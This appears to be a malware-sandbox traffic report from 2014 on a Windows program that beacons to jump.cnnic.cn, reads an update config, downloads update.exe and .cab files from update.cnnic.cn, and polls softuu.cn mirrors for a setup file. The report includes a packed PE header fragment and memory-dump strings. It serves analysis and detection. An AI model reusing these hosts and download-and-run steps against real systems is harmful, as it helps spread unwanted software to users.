Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Content-Length: 183
sid=0102&pid=C_gr294&sp=002.006.000.000&cid=aaamcjdlnpcpaaamcjdlnpcpdadadadadadadadadadadadadadadadadadadadbmdilgeogeapgmjlebcngahefeaommfomlhgempgjljdpjaggoogjhoifimlgpjhb0003&bind=0
HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 1806
Date: Wed, 16 Apr 2014 08:33:48 GMT
Connection: close
<html><head><title>Apache Tomcat/7.0.22 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 500 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Exception report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>The server encountered an internal error () that prevented it from fulfilling this request.</u></p><p><b>exception</b> <pre>java.io.FileNotFoundException: /home/knet/stat/cfg/url.properties (No such file or directory)..java.io.FileInputStream.open(Native Method)..java.io.FileInputStream.<init>(FileInputStream.java:120)..java.io.FileInputStream.<init>(FileInputStream.java:79)..java.io.FileReader.<init>(FileReader.java:41)..net.knowledgeservice.pub.util.FileUtil.fileToArray(FileUtil.java:103).
<<
<<< skipped >>>
GET /cdnClient/update/v26_p/data2.cab HTTP/1.1
Host: update.cnnic.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash,*/*
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
<<< skipped >>>
GET /cdnClient/update/v26_p/version.dat HTTP/1.1
Host: update.cnnic.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash,*/*
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 16 Apr 2014 08:33:46 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 08:54:32 GMT
ETag: "292a0e9-1e2-48b7d5e0e2200"
Accept-Ranges: bytes
Content-Length: 482
Connection: close
Content-Type: text/plain; charset=UTF-8
[version]..ver=2.6.0.42..[update]..url=hXXp://update.cnnic.cn/cdnClient/update/v26_p/version.dat..[stat]..stat=hXXp://jump.cnnic.cn/stat/stat..live=hXXp://jump.cnnic.cn/stat/first..uninstall=hXXp://jump.cnnic.cn/stat/uninstall..[exe]..version=2.6.0.12..url=hXXp://update.cnnic.cn/cdnClient/update/v26_p/update.exe..[cab]..version=2.6.0.32..url=http://update.cnnic.cn/cdnClient/update/v26_p/data.cab..[relay]..url=hXXp://update.cnnic.cn/cdnClient/update/v26_p/data2.cab..
GET /down/wxpSetup256.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: www2.softuu.cn
Connection: Keep-Alive
Cookie: PHPSESSID=hpu1peah8f6ekmonnpelhl7k24
HTTP/1.1 404 Not Found
Server: Tengine/1.4.2
Date: Wed, 16 Apr 2014 08:31:30 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
1224.............Z[o.Hv. 5l.e.)....ey!K.[m[v[..` PdQ,.7.E]..H...`..d......y.Kv. .6.v~.\v.ENU..lw{:....c.R.Xu......j...Q...x...u..>..>%.r(...M..6.b/...Q....JP....3..Y....4..z...k@.Q...[.........O....O6z.Y....p(..=X..us{..T.N. .oc2iJm......y.%C<4%.g....@.......Z9......nJ7x>.C3Z....E.?.._7..Y..!...a..b..yH.H>.Ji...q...Tx@........[Q.b..]....G...3y.Q...bb4.c4%.F..R..X......CWg.P..6...?p.lt.c.....].3...,Xa.-........C......J#..&..V(L...ZT....._Gy&...n3.-..y.{..F.^....V).. .\.......(..J...Tvv*j.%..|.N.....d:1J.......9_...f .sx.F.9.M2.MG6.l.r...#;D.U...vI...].....X6|....2..1.0.....d..1......r ......}.ej....P.............$*..U.D@ql......h...C.A...C?.d.{....9..o..O.....1.4....I.1.F.[.B.. .;d.i.l....\`.......=g..........b0k.GKw.3..Cb.>...._c"..._..O...w...w....8 . .X..>......VHt...0...l5.....T*5.?"l.Z.....7......"H..pH..a".<....gM<...)0A....L0c..$ u.i:..X..S.x)..5A....6......M1..T[...<HP.-2.t........6[!.6.....$..}.!...c(.d'...f.[{.....C(..a-........h...".....:^.J].....r.'.3.0....'....f......Z.....I.1..t(.h...(!.9...g.\...$...h....pV/...o8.F.q......E.!%.BW..7"w..qm.R.LK.R....8?&..E!....a....bJLjk.*...c......pV.*......../'...@".Am5.\.cE.W.Z.k4........".........x(2f......N.....b*.T.hk.Kf.^...IE...t. ..?E%.;.@ko6.%6..>...L.E.CL....O.%@H.0j0'.-.Hr.)...B)..b.....R..*l.......#$.-...X..RJ'..a...."..w.d......fD..jc....3.96.y..}....a..t(....1...s......8(WR..v..P...,..J*Y...zQo..z.....W.7..K..W....I...B.K..$.T..KH0...TtB..&.[.qi>...P.K......./X...\..S6(...]...P.*!T..A.T.Y.m..3c...bK%z.M.:*h.M05....
<<
<<< skipped >>>
GET /down/wxpSetup256.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: www3.softuu.cn
Connection: Keep-Alive
Cookie: PHPSESSID=qekkaf4qlu6hc6dmgbnt9onfp1
HTTP/1.1 404 Not Found
Server: Tengine/1.4.2
Date: Wed, 16 Apr 2014 08:31:27 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
1224.............Z[o.Hv. .6....D....B.,.....|..@...X6o&..X1.....b'.>........."@.l.........SU.$.mwg0..`l@,..NU....Um~.9l.\...6q....d.sl...z;BU.bK........)bT......gb..Y^.H.?h]}.u..?h]{.u.q....7.l..._~.....(...C....2l..[..":p..2....).}. ..'.....i...H...!...F.4cb.0.N..]....|..f...s.#...s|..vf...(...I..!...........p.G.t...H.(2B...{ .S.............4EB...l"a.....[pA.\.......Y~.......-.l..8Q:........\.3..@.`.9....s...C.."[...V.q.4.D.|~:......U.=.*.Q...t..o.8...K.0..b.U(..r....R..#oW;..S..[Ue{..._.P...T.*H.H..#.8h..O...e3.k6#2....7...'..H&.LS...w$.K.*....JvI...]...I.o"..Y..;&.Fr..6... &...."]......7.O.Dl....J.......`.A...D%.....(...A..c....w(QH..8..@r..K.>."d..t.../\=.cOS..n...Ci..E!...d..cO3`.......^.}p.E..K..l.9..HS....^-...\.....TP....aQ.....?.......................?...Z!......?.a..._...b.......B...&.q'..A. .T(..G0.*2..=.....g.R4.&(.r...D..;.J]l.........^Jb}M..F!&..x...uS..6...wB.$....i...].Wm.....i.M..rM...>....{c(..N.C..N^{.........a-........h...".....:V.J...D..2.'.3.0.....).hK...s.....108...c.%.P...._..8..=&>m.... Q&~...@....@.....7..k.o...P..b.)t5gz#|k.... ....(..9..scl.Y!D...#....]L.Il.^a..s...l.i.c....0[ ..\......HD...f*'8V.z......6&.c..`...O......{x(Pfq.....N..t..|*.T.hk.Kf%.((.?..4.... ....d.p..}...t"\}p..05!..l./...o.........|....b....P.`...p......2./a..(.A..vK..1.6*...GC...i..].VN......gF..\m.7.px.3..3.A.....!......s.7. {...,....G..J....$..(.....J...'...........'.o../..]}.Rn$u\.r..i...RY./.A9Qc.....M......@..C.,E\Rk., .`..|r..N....^t._:C...P...eR.fy.}.....^.[*.Stb.Q..t..A.?.....K....O.PR..(".#.Q
<<
<<< skipped >>>
GET /cdnClient/update/v26_p/update.exe HTTP/1.1
Host: update.cnnic.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash,*/*
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 16 Apr 2014 08:33:51 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 09:00:08 GMT
ETag: "292a0e8-6bc80-48b7d72151600"
Accept-Ranges: bytes
Content-Length: 441472
Connection: close
Content-Type: application/octet-stream
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u........=.uN.:.h........&.../....p....`.Q..6D..(N......{.".D......S.4.(....o..x........................PE..L.....@L.................P...P...............`....@.................................9.......................................................................T........................................................................................text....P.......*..................@....rdata.......`.......0..............@....data....0...p...l...6..............@....rsrc...............................@....aspack.. ..........................@....adata..............................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<<
<<< skipped >>>
GET /down/wxpSetup256.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: www5.softuu.cn
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Server: Tengine/1.4.2
Date: Wed, 16 Apr 2014 08:31:57 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.10
Set-Cookie: PHPSESSID=l0471imf8i68j3bo1abkea0tm3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
1224.............Z[o.Hv. .6....D....B.,.....|..@...X6o&..X1.....b'.>........."@.l.........SU.$.mwg0..`l@,..NU....Um~.9l.\...6q....d.sl...z;BU.bK........)bT......gb..Y^.H.?h]}.u..?h]{.u.q....7.l..._~.....(...C....2l..[..":p..2....).}. ..'.....i...H...!...F.4cb.0.N..]....|..f...s.#...s|..vf...(...I..!...........p.G.t...H.(2B...{ .S.............4EB...l"a.....[pA.\.......Y~.......-.l..8Q:........\.3..@.`.9....s...C.."[...V.q.4.D.|~:......U.=.*.Q...t..o.8...K.0..b.U(..r....R..#oW;..S..[Ue{..._.P...T.*H.H..#.8h..O...e3.k6#2....7...'..H&.LS...w$.K.*....JvI...]...I.o"..Y..;&.Fr..6... &...."]......7.O.Dl....J.......`.A...D%.....(...A..c....w(QH..8..@r..K.>."d..t.../\=.cOS..n...Ci..E!...d..cO3`.......^.}p.E..K..l.9..HS....^-...\.....TP....aQ.....?.......................?...Z!......?.a..._...b.......B...&.q'..A. .T(..G0.*2..=.....g.R4.&(.r...D..;.J]l.........^Jb}M..F!&..x...uS..6...wB.$....i...].Wm.....i.M..rM...>....{c(..N.C..N^{.........a-........h...".....:V.J...D..2.'.3.0.....).hK...s.....108...c.%.P...._..8..=&>m.... Q&~...@....@.....7..k.o...P..b.)t5gz#|k.... ....(..9..scl.Y!D...#....]L.Il.^a..s...l.i.c....0[ ..\......HD...f*'8V.z......6&.c..`...O......{x(Pfq.....N..t..|*.T.hk.Kf%.((.?..4.... ....d.p..}...t"\}p..05!..l./...o.........|....b....P.`...p......2./a..(.A..vK..1.6*...GC...i..].VN......gF..\m.7.px.3..3.A.....!......s.7. {...,....G..J....$..(.....J...'...........'.o../..]}.Rn$u\.r..i...RY./.A9Qc.....M......@..C.,E\Rk., .`..|r..N....^t._:C...P...eR.fy.}.....^.[*.Stb.Q..t..A.?.....K....O.PR..(".#.Q
<<
<<< skipped >>>
GET /down/wxpSetup256.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: www4.softuu.cn
Connection: Keep-Alive
Cookie: PHPSESSID=kc4506f6moav0eu2hecipfahm4
HTTP/1.1 404 Not Found
Server: Tengine/1.4.2
Date: Wed, 16 Apr 2014 08:31:46 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
1224.............Z[o.Hv. 5l.e.)....ey!K.[m[v[..` PdQ,.7.E]..H...`..d......y.Kv. .6.v~.\v.ENU..lw{:....c.b.Xu......j...Q...x...u..>..>%.r(...M..6.b....Q....JP....3..Y....4..z...k@.Q...[.........O....O6z.Y....p(..=X..us{..T.N. .oc2iJm......y.%C.4%.g....@.......Z9......nJ7x>.C3Z....E.?.._7..Y..!...a..b..yH.H>.Ji...q...Tx@........[Q.b..]....G...3y.Q...bb4.c4%.F..R..X......CWg.P..6...?p.lt.c.....].3...,Xa.-........C......J#..&..V(L...ZT....._Gy&...n3.-..y.{..F.^....V).. .\.......(..J...Tvv*j.%..|.N.....d:1J.......9_...f .s..F.9.M2.MG6.l.r...#;D.U...vI...].....X6|....2..1.0.....d..1......r ......}.ej....P.............$*..U.D@ql......h...C.A.=.......X....a.7f.'.x....x...t.$..J#.-.......2.4.......0.....[...da...E..kj1.5......k.!1B...]..1.d../...?..._.....[x..w.{..w......B $...z..S.....E{Q*.......-..Hh......R...BY8$..0.i......&..K... ....&.1Vw....4.FQ,...C........CB...t......m.-k.Q.$....i...].Wm.S...k.M..rM...>..G..1.....Pd....OHDF.!.......Z.LL..4..X.U.lnI./C..Dkb..9....q...Q.....R.}..Bpu.C.......lI:.C.X.......c..f.U...s..4...>8..l../.p#..a..L......M..y...;.....)..%E)...h...K....X..0...w1%&..z.cC.1....Lk8.D.......r....QB .....i......F-.5...r....V..O..B....<.....S.yL..}z..1.D*..5.%.B/...OE...t. ..?E%.;.@k_6.%6..>...L.E.CL......J..6`.`N.[$...S../.R.....#=\.h.U.x..UE..FH.[.5...Q..N>....N.E...r..a.R....4$..z...g>sl<............P.1.xc........0.qP.........E.X...T.D.?...b..E...WOQ.@./.B\}.Sn$uB....i..`RY./!.\..R..9$.Ll)...H..C.,E\Vk., .`..br..N....^t._:C...P...eR.f..}....J..-..)61...M6.. ..c..M
<<
<<< skipped >>>
POST /stat/stat HTTP/1.1
Host: jump.cnnic.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash,*/*
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Content-Length: 25
sid=1005&pid=0&sw=C_gr294
HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 1806
Date: Wed, 16 Apr 2014 08:33:49 GMT
Connection: close
<html><head><title>Apache Tomcat/7.0.22 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 500 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Exception report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>The server encountered an internal error () that prevented it from fulfilling this request.</u></p><p><b>exception</b> <pre>java.io.FileNotFoundException: /home/knet/stat/cfg/url.properties (No such file or directory)..java.io.FileInputStream.open(Native Method)..java.io.FileInputStream.<init>(FileInputStream.java:120)..java.io.FileInputStream.<init>(FileInputStream.java:79)..java.io.FileReader.<init>(FileReader.java:41)..net.knowledgeservice.pub.util.FileUtil.fileToArray(FileUtil.java:103).
<<
<<< skipped >>>
POST /stat/stat HTTP/1.1
Host: jump.cnnic.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash,*/*
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Content-Length: 54
sid=0104&os=6&FromTo=(002.006.000.000-002.006.000.042)
HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 1806
Date: Wed, 16 Apr 2014 08:33:49 GMT
Connection: close
<html><head><title>Apache Tomcat/7.0.22 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 500 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Exception report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>The server encountered an internal error () that prevented it from fulfilling this request.</u></p><p><b>exception</b> <pre>java.io.FileNotFoundException: /home/knet/stat/cfg/url.properties (No such file or directory)..java.io.FileInputStream.open(Native Method)..java.io.FileInputStream.<init>(FileInputStream.java:120)..java.io.FileInputStream.<init>(FileInputStream.java:79)..java.io.FileReader.<init>(FileReader.java:41)..net.knowledgeservice.pub.util.FileUtil.fileToArray(FileUtil.java:103).
<<
<<< skipped >>>
Map
Strings from Dumps
svchost.exe_1992:
svchost.exe_1992_rwx_003D0000_00002000:
The procedure %s could not be located in the DLL %s.
The ordinal %d could not be located in the DLL %s.
svchost.exe_1992_rwx_00401000_000B5000:
idnsvr.exe_4052: